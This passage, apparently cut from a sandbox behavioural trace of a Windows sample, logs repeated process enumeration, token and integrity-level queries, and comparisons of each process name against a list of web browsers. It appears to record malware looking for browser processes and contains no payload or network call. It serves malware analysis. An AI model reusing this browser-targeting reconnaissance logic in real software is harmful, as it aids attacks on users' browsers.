bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0573.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0573.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0573.278] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0573.278] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0573.278] GetLastError () returned 0x7a [0573.278] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0573.278] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0573.278] CloseHandle (hObject=0x29c) returned 1 [0573.278] CloseHandle (hObject=0x298) returned 1 [0573.278] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0573.278] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0573.278] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0573.278] GetLastError () returned 0x7a [0573.278] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0573.278] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0573.278] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0573.278] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0573.278] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0573.278] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0573.278] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0573.278] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0573.278] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0573.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0573.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0573.279] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0573.279] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0573.279] GetLastError () returned 0x7a [0573.279] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0573.279] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0573.279] CloseHandle (hObject=0x29c) returned 1 [0573.279] CloseHandle (hObject=0x298) returned 1 [0573.279] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0573.279] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0573.279] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0573.279] GetLastError () returned 0x7a [0573.279] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0573.279] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0573.279] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0573.279] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0573.279] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0573.279] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0573.279] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0573.279] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0573.279] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0573.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0573.279] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0573.279] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0573.279] GetLastError () returned 0x7a [0573.279] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0573.279] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0573.280] CloseHandle (hObject=0x29c) returned 1 [0573.280] CloseHandle (hObject=0x298) returned 1 [0573.280] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0573.280] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0573.280] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0573.280] GetLastError () returned 0x7a [0573.280] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0573.280] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0573.280] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0573.280] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0573.280] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0573.280] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0573.280] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0573.280] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0573.280] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0573.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0573.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0573.280] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0573.280] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0573.280] GetLastError () returned 0x7a [0573.280] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0573.280] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0573.280] CloseHandle (hObject=0x29c) returned 1 [0573.280] CloseHandle (hObject=0x298) returned 1 [0573.280] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0573.280] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0573.281] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0573.281] GetLastError () returned 0x7a [0573.281] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0573.281] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0573.281] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0573.281] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0573.281] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0573.281] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0573.281] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0573.281] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0573.281] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0573.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0573.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0573.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0573.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0573.281] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0573.281] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0573.281] GetLastError () returned 0x7a [0573.281] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0573.281] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0573.281] CloseHandle (hObject=0x29c) returned 1 [0573.281] CloseHandle (hObject=0x298) returned 1 [0573.281] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0573.281] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0573.281] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0573.281] GetLastError () returned 0x7a [0573.281] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0573.282] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0573.282] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0573.282] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0573.282] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0573.282] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0573.282] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0573.282] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0573.282] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0573.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0573.282] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0573.282] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0575.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9a28) returned 0xc0000004 [0575.289] VirtualAlloc (lpAddress=0x0, dwSize=0xaa28, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0575.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xaa28, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0575.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0575.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0575.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0575.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0575.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0575.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0575.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0575.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0575.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0575.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0575.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0575.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0575.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0575.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0575.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0575.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0575.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0575.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0575.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0575.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0575.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0575.293] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0575.293] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0575.293] GetLastError () returned 0x7a [0575.293] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0575.293] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0575.293] CloseHandle (hObject=0x29c) returned 1 [0575.294] CloseHandle (hObject=0x298) returned 1 [0575.294] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0575.294] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0575.294] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0575.294] GetLastError () returned 0x7a [0575.294] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0575.294] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0575.294] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0575.295] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0575.295] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0575.295] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0575.295] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0575.295] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0575.295] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0575.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0575.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0575.295] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0575.295] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0575.295] GetLastError () returned 0x7a [0575.296] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0575.296] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0575.296] CloseHandle (hObject=0x29c) returned 1 [0575.296] CloseHandle (hObject=0x298) returned 1 [0575.296] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0575.296] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0575.296] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0575.296] GetLastError () returned 0x7a [0575.297] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0575.297] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0575.297] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0575.297] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0575.297] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0575.297] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0575.297] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0575.297] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0575.297] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0575.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0575.297] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0575.298] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0575.298] GetLastError () returned 0x7a [0575.298] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0575.298] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0575.298] CloseHandle (hObject=0x29c) returned 1 [0575.298] CloseHandle (hObject=0x298) returned 1 [0575.298] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0575.298] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0575.298] GetTokenInformation (in: TokenHandle=0x29c, 